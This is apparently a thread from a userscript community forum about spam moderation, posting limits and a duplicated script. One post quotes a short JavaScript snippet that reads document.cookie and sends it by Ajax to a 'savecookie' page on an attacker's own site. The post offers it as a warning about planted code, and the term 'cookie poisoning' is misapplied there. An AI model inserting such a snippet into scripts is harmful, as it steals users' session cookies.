Unfortunately "topics per day" will probably result in people spamming other topics.

I'm thinking limit new users to 5 posts the first day, 10 the second, 15 the third, ...

yes this is known as cookie poisoning i think i read about it in Wikipedia
all they do is insert a variable in the script like this
cookie=document.cookie;
and they call an Ajax request to store the cookie on a web of their own like this:
var xmlHttp
xmlHttp=GetXmlHttpObject();
var url="savecookie.asp or .php";
url=url+"?cookie="+cookie;
xmlHttp.open("GET",url,true);
xmlHttp.send(null);

if you see any of these lines in your scripts delete it immediately and report it

I was just looking up a script of Henrik's for this topic (this script here), and it looks like it's been duplicated here with one very minor change.

That user seems to have modified it and used it for a number of other applications which is fine but I'm not sure about the original duplication of Henrik's script.

@steeev, I do apologize. I wanted to make sure not to delete comments that were on his own scripts (which I agree are questionable). I have removed those comments not on his scripts and have talked with him about stopping the spamming of others lest I take more extreme actions.

@znerp, removed, plus I do consider those things spam... it is confusing why there appears to be converstations around them. Perhaps I make a forum called "Video" and people can talk there?

I think I killed most of them.

The negative number was because I destroyed all the posts in the topic but not the topic itself. There isn't an auto-callback (yet) to destroy the parent.

On the subject, you don't class all of those video converter things as spam? They appear to be dressing the posts up as a discussion, but it just appears to me to be plain advertising, which isn't what I think these forums (even the off-topic banana bar) are all about.
